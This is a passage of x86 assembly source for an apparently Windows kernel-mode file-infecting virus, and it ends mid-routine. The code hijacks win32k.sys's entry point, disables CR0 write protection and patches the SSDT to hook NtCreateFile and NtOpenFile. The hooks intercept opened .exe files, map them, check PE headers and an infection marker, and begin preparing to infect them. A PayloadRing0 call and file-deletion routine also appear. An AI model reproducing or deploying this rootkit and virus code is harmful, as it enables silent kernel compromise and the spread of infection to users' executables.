;;;;;;;;;;;;;
push 00000000h ;This space in stack will be filled with the entry point
;address of win32k.sys
pushfd
pushad
;;;;;;;;;;;;;;;;;;;;;;;;
callz R0_Doff ;i calculate delta offset.
R0_Doff:
pop ebp
sub ebp,offset R0_Doff
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
lea eax,[ebp + EPointSystem] ;our target is to search image base of win32k.sys in memory.
xor ax,ax ;hardcoded would be 0A0000000h in my system.
add eax,1000h
SearchBaseImage:
sub eax,1000h
cmp word ptr [eax],'ZM'
jne SearchBaseImage
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,[ebp + EntryPointWin32ksys] ;We have the old entry point and the image base
add ebx,eax ;so we have the entry point address. We put
mov [esp + cPushad + cPushfd],ebx ;that entry point after pushad and pushfd bytes
;;;;;;;;;;;;;;;;;;;;;;;; ;in stack for using ret instruction later and
;for jumping entry point of win32k.sys
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[esp + cPushad + cPushfd + 4] ;address in stack of a zone of ntoskrnl(in function
xor ax,ax ;ExCreateCallback).With this address we will get
add eax,1000h ;ntoskrnl base addr
;eax -> a part of ntoskrnl
SearchNtoskrnl:
sub eax,1000h
cmp word ptr [eax],'ZM'
jne SearchNtoskrnl
;eax -> base of ntoskrnl
mov [ebp + Ntoskrnl],eax
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
;now we will get somethings that will be useful for hooking NtCreateFile...SSDT address,
;syscall number of NtCreateFile, ....
;There is a undocumented entry in the export table of ntoskrnl, KeServiceDescriptorTable,
;and this entry is the key for accessing the system service dispatch table where we must
;patch for hooking a service(NtCreateFile for example ;)
;KeServiceDescriptorTable points to a structure like this:
; {
; DWORD ServiceTableBase - pointer to system service dispatch table(SSDT)
; DWORD ServiceCounterTable - not important for us
; DWORD NumberOfServices - number of services in system service dispatch table
; DWORD ParamTableBase - pointer to system service parameter table(SSPT)
; }
;
;We want to get the number of the NtCreateFile service and then we search in this table
;and we patch the address of NtCreateFile rutine with a address of our code
;;;;;;;;;;;;;;;;;;;;;;;;
;eax = ntoskrnl base
GezApi eax,KeServiceDescriptorTableCRC,KSDTNameLen
mov [ebp + KeServiceDescriptorTable],eax
;;;;;;;;;;;;;;;;;;;;;;;;
;ill get SSDT from that service descriptor table
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[eax]
mov [ebp + SSDT],eax
;;;;;;;;;;;;;;;;;;;;;;;;
;now ill get from ntoskrnl the addr of NtCreateFile
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + Ntoskrnl]
GezApi eax,NtCreateFileCRC,NCFNameLen
mov [ebp + NtCreateFileAddr],eax
;;;;;;;;;;;;;;;;;;;;;;;;
;Ill get service ID from ZwCreateFile
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + Ntoskrnl]
GezSyscall eax,ZwCreateFileCRC,ZCFNameLen
;;;;;;;;;;;;;;;;;;;;;;;;
;now ill search in the SSDT the address of the entry of NtCreateFile where we will hook
;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,[ebp + SSDT]
;ebx + eax*4 -> entry
shl eax,2
add ebx,eax
;ebx -> entry
mov [ebp + NtCreateFileEntryAddr],ebx
;;;;;;;;;;;;;;;;;;;;;;;;
;and with NtOpenFile same thing
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + Ntoskrnl]
GezApi eax,NtOpenFileCRC,NOFNameLen
mov [ebp + NtOpenFileAddr],eax
;;;;;;;;;;;;;;;;;;;;;;;;
;Ill get service ID from ZwOpenFile
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + Ntoskrnl]
GezSyscall eax,ZwOpenFileCRC,ZOFNameLen
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,[ebp + SSDT]
;ebx + eax*4 -> entry
shl eax,2
add ebx,eax
;ebx -> entry
mov [ebp + NtOpenFileEntryAddr],ebx
;;;;;;;;;;;;;;;;;;;;;;;;
;We hook NtCreateFile and NtOpenFile
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,cr0 ;we set write protect flag to 1, and in this
push eax ;supervision of writing readonly mem is disabled
or eax,00010000h ;We do this for writing SSDT coz is possible (under
mov cr0,eax ;XP is default) SSDT is read only.
;(Thx Ratter ;)
;;;;;;;;;;;;;;;;;;;;;;;;
;;;
;Note in the next inst we get the service ID of NtCreateFile and NtOpenFile from Zws funcions
;of them. I got it searching NtCreateFile and NtOpenFile in ntoskrnl and scanning SSDT
;comparing with entrys and when is the same value that is the entry.Ratter said me the problem
;of this: NtOpenFile or NtCreateFile could be previosly hooked and with this method this
;will not work( Thx again Ratter :)
;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,[ebp + NtCreateFileEntryAddr]
lea eax,[ebp + NtCreateFileHookRutine]
mov [ebx],eax ;in this moment we HOOK NtCreateFile
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,[ebp + NtOpenFileEntryAddr]
lea eax,[ebp + NtOpenFileHookRutine]
mov [ebx],eax ;in this moment we HOOK NtOpenFile
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
pop eax ;we restore WP flag to original value
mov cr0,eax
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
callz GetApisRing0 ;ill get some apis for no calling all time GezApi
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
callz DeleteWin32ksy ;i must delete win32k.sy if still not deleted
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
callz PayloadRing0
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
ReturnWin32ksys:
popad
popfd
ret ;previosly i moved entry point adress of win32k.sys at position in stack
;so this ret will fill eip with start point of win32k.sys
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
NtOpenFileHookRutine:
;;;;;;;;;;;;;;;;;;;;;
;Stub whose address is stored into the SSDT slot of NtOpenFile earlier in this
;file ("in this moment we HOOK NtOpenFile"), so the service dispatcher lands
;here instead of in ntoskrnl. It preserves the caller's state, resolves its own
;runtime address, records where the original NtOpenFile lives and joins the
;shared path. Detection note: after the hook the SSDT entry should point outside
;the ntoskrnl image, which a service-table integrity check can flag.
pushfd ;save flags and all general registers so the real service sees them intact
pushad
;;;;;;;;;;;;;;;;;;;;;;;;
callz doff_hookOF ;delta offset
doff_hookOF:
pop ebp ;ebp = runtime address of doff_hookOF
sub ebp,offset doff_hookOF ;ebp = runtime minus assembled address; every [ebp + X] below is relocated with it
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtOpenFileAddr]
mov [ebp + HookRealAddr],eax ;we put the jump to real code of NtOpenFile
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
jmpz GeneralCodeForInfectionRing0 ;shared path defined later in the file; it continues past this stub
;;;;;;;;;;;;;;;;;;;;;;;;
;NTSTATUS NtOpenFile(
; OUT PHANDLE FileHandle,
; IN ACCESS_MASK DesiredAccess,
; IN POBJECT_ATTRIBUTES ObjectAttributes,
; OUT PIO_STATUS_BLOCK IoStatusBlock,
; IN ULONG ShareAccess,
; IN ULONG OpenOptions
; );
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
NtCreateFileHookRutine:
pushfd
pushad
;;;;;;;;;;;;;;;;;;;;;;;;
callz doff_hookCF ;delta offset
doff_hookCF:
pop ebp
sub ebp,offset doff_hookCF
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtCreateFileAddr]
mov [ebp + HookRealAddr],eax ;we put the jump to real code of NtCreateFile
;;;;;;;;;;;;;;;;;;;;;;;;
;NTSTATUS NtCreateFile(
; OUT PHANDLE FileHandle,
; IN ACCESS_MASK DesiredAccess,
; IN POBJECT_ATTRIBUTES ObjectAttributes,
; OUT PIO_STATUS_BLOCK IoStatusBlock,
; IN PLARGE_INTEGER AllocationSize OPTIONAL,
; IN ULONG FileAttributes,
; IN ULONG ShareAccess,
; IN ULONG CreateDisposition,
; IN ULONG CreateOptions,
; IN ULONG EaBuffer OPTIONAL,
; IN ULONG EaLength
; );
;
;this only for NtCreateFile:
;;;;;;;;;;;;;;;;;;;;;;;;
;i get some datas from parameters
mov eax,[esp + cPushad + cPushfd + 4 + 14h]
mov [ebp + AttributesFileRing0],eax ;i get the attributes of file
mov eax,[esp + cPushad + cPushfd + 4 + 1ch]
mov [ebp + CreateDispositionFileRing0],eax ;i get manner for opening the file
mov eax,[esp + cPushad + cPushfd + 4 + 20h]
mov [ebp + CreateOptionsFileRing0],eax ;i get some more flags relative
;;;;;;;;;;;;;;;;;;;;;;;; ;to manner of opening the file
;;;;;;;;;;;;;;;;;;;;;;;;
;I want a existing file non directory
test dword ptr [ebp + CreateDispositionFileRing0],FILE_OPEN
jz StopInfectionRing0
;test dword ptr [ebp + CreateOptionsFileRing0],FILE_NON_DIRECTORY_FILE
;jz StopInfectionRing0
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
;jmpz GeneralCodeForInfectionRing0
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
GeneralCodeForInfectionRing0:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
callz UnhookWhile ;ill unhook apis while hooking rutine coz for example
;;;;;;;;;;;;;;;;;;;;;;;; ;if we call ZwOpenFile we will go to a infinite loop
;OBJECT_ATTRIBUTES {
; ULONG Length;
; PUNICODE_STRING ObjectName;
; HANDLE RootDirectory;
; PSECURITY_DESCRIPTOR SecurityDescriptor;
; PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;
; ULONG Attributes;
; }
;
;UNICODE_STRING {
; USHORT Length; ;len in bytes of Buffer
; USHORT MaximumLength;
; PWSTR Buffer;
; }
;note if RootDirectory parameter is null,ObjectName has a fully qualified file specification,
;path+name,but if RootDirectory is non null,then ObjectName has only the name of the object
;relative to RootDirectory directory.
;when we call NtOpenFile we must use both RootDirectory and ObjectName.
;;;;;;;;;;;;;;;;;;;;;;;;
;Ill get the file name of the file i want to infect
mov edi,[esp + cPushad + cPushfd + 4 + 8] ;edi -> ObjectAttributes
mov eax,[edi + 4] ;eax = RootDirectory
mov [ebp + RootDirectoryRing0],eax
mov esi,[edi + 8] ;esi -> unicode string of the name
mov eax,[esi]
mov dword ptr [ebp + FileNameRing0],eax
lea edi,[ebp + StringRing0] ;edi -> our buffer for unicode string of name
mov dword ptr [ebp + FileNameRing0 + 4],edi
movzx ecx,word ptr [esi] ;ecx = long of unicode string
mov esi,[esi + 4]
rep movsb ;i copy the buffer
;;;;;;;;;;;;;;;;;;;;;;;;
;vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv |quitar esto| vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
movzx ecx,word ptr [ebp + FileNameRing0]
mov eax,dword ptr [ebp + FileNameRing0 + 4]
add eax,ecx
dec eax
dec eax
cmp byte ptr [eax],'e'
jne StopInfectionRing0
dec eax
dec eax
cmp byte ptr [eax],'x'
jne StopInfectionRing0
dec eax
dec eax
cmp byte ptr [eax],'e'
jne StopInfectionRing0
dec eax
dec eax
cmp byte ptr [eax],'.'
jne StopInfectionRing0
dec eax
dec eax
cmp byte ptr [eax],'z'
jne StopInfectionRing0
dec eax
dec eax
cmp byte ptr [eax],'z'
jne StopInfectionRing0
dec eax
dec eax
cmp byte ptr [eax],'z'
jne StopInfectionRing0
;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ |quitar esto| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
;;;;;;;;;;;;;;;;;;;;;;;;
movzx ecx,word ptr [ebp + FileNameRing0] ;I test if file is a .exe file
mov eax,dword ptr [ebp + FileNameRing0 + 4]
add eax,ecx
dec eax
dec eax
or byte ptr [eax],20h
cmp byte ptr [eax],'e'
jne StopInfectionRing0
dec eax
dec eax
or byte ptr [eax],20h
cmp byte ptr [eax],'x'
jne StopInfectionRing0
dec eax
dec eax
or byte ptr [eax],20h
cmp byte ptr [eax],'e'
jne StopInfectionRing0
dec eax
dec eax
cmp byte ptr [eax],'.'
jne StopInfectionRing0
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
callz MapFileRing0 ;map the file for infection ;)
or eax,eax
jz StopInfectionRing0
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,eax
;ebx = Base of Mapped File
cmp word ptr [ebx],'ZM'
jne CloseAndStopInfectionRing0
mov edi,[ebx + 3ch]
add edi,ebx
;edi -> PE
cmp word ptr [edi],'EP'
jne CloseAndStopInfectionRing0
cmp word ptr [edi + 8],'zs'
je CloseAndStopInfectionRing0 ;is it already infected?
mov ax,word ptr [edi + 16h]
test ax,00000002h ;yes IMAGE_FILE_EXECUTABLE_IMAGE
je CloseAndStopInfectionRing0
test ax,00001000h ;no IMAGE_FILE_SYSTEM
jne CloseAndStopInfectionRing0
test ax,00002000h ;no IMAGE_FILE_DLL
jne CloseAndStopInfectionRing0
mov ax,[edi + 5ch]
test ax,00000001h ;no IMAGE_SUBSYSTEM_NATIVE
jne CloseAndStopInfectionRing0
;ebx->MZ
;edi->PE
;;;;;;;;;;;;;;;;;;;;;;;;
;we will search EPoint of file
mov edx,[edi + 28h]
;edx = RVA epoint,we need the pointer to raw data
movzx ecx,word ptr [edi + 6]
mov eax,edi
add eax,0F8h-28h ;sections
inc ecx
GoToSectionEPointInfectionRing0:
dec ecx
or ecx,ecx
jz CloseAndStopInfectionRing0
add eax,28h
cmp dword ptr [eax.IMAGE_SECTION_HEADER.SH_VirtualAddress],edx
jnle GoToSectionEPointInfectionRing0
mov esi,dword ptr [eax.IMAGE_SECTION_HEADER.SH_VirtualAddress]
add esi,dword ptr [eax.IMAGE_SECTION_HEADER.SH_SizeOfRawData]
cmp edx,esi
jnl GoToSectionEPointInfectionRing0
;eax->.text section header
mov dword ptr [ebp + textSecHeader],eax
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
;now we will search relocs section
mov edx,[edi.IMAGE_NT_HEADERS.NT_OptionalHeader.OH_DirectoryEntries.DE_BaseReloc.DD_VirtualAddress]
movzx ecx,word ptr [edi + 6]
mov eax,edi
add eax,0F8h-28h ;sections